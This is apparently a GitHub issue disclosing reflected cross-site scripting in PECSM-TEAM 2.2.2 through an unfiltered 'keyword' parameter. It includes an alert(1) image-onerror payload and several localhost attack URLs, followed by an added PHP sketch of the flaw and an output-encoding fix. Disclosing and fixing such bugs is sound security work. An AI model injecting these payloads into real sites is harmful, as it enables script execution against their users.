
PECSM-TEAM 2.2.2 has multiple reflected Cross Site Scripting Vulnerabilities #3

Closed
@snappyJack

Description

@snappyJack

I found multiple reflected cross-site scripting vulnerabilities where the page uses Model_index.php; we can see there is no XSS filter on the "keyword" parameter.
Now I input the payload: aa"><img src=x onerror=alert(1)>
The full URL is: http://127.0.0.1/Public/?g=Team&m=User&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E

And the code is running.

There are lots of pages that use Model_index.php, and they all have reflected cross-site scripting vulnerabilities, like:

http://127.0.0.1/Public/?g=Team&m=User&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E

http://127.0.0.1/Public/?g=Team&m=User_group&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E

http://127.0.0.1/Public/?g=Team&m=Department&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E

http://127.0.0.1/Public/?g=Team&m=Bulletin&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E

..
..
..
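
An added example, not code from the project or the reporter: a minimal PHP sketch of the pattern the report describes, a "keyword" query parameter echoed into an HTML attribute, next to a version that encodes it at output time. The function names and the form markup are assumptions; the actual contents of Model_index.php are not shown on this page.

```php
<?php
// Hypothetical sketch: the real Model_index.php is not shown in the report.
// Both functions render a search box that echoes the "keyword" parameter back.

// Vulnerable pattern: the raw value lands inside a double-quoted attribute,
// so a value containing "> closes the attribute and then the tag.
function render_search_unsafe(string $keyword): string
{
    return '<input type="text" name="keyword" value="' . $keyword . '">';
}

// Hardened pattern: encode for the HTML attribute context when writing output.
// ENT_QUOTES covers both quote styles; ENT_SUBSTITUTE replaces invalid UTF-8
// sequences instead of returning an empty string.
function render_search_safe(string $keyword): string
{
    $encoded = htmlspecialchars($keyword, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="keyword" value="' . $encoded . '">';
}

// Regression check: the template emits exactly one tag (the <input>), so any
// additional "<" or ">" in the output was contributed by the input value.
function reflects_markup(string $html): bool
{
    return substr_count($html, '<') !== 1 || substr_count($html, '>') !== 1;
}

// Query string taken from the report's first URL; parse_str applies the same
// decoding PHP uses when it fills $_GET.
parse_str(
    'g=Team&m=User&a=index&keyword=aa%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E',
    $query
);
// Reject array-valued parameters (keyword[]=...) before treating it as text.
$keyword = is_string($query['keyword'] ?? null) ? $query['keyword'] : '';

$renderers = ['unsafe' => 'render_search_unsafe', 'safe' => 'render_search_safe'];
foreach ($renderers as $label => $render) {
    $html = $render($keyword);
    $flag = reflects_markup($html) ? 'yes' : 'no';
    printf("%-6s reflects markup: %s\n       %s\n", $label, $flag, $html);
}
```

Because the report says many pages share Model_index.php, encoding in the shared template fixes every listed URL at once, and a check like `reflects_markup` can be run against each `m=` value as a regression test.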
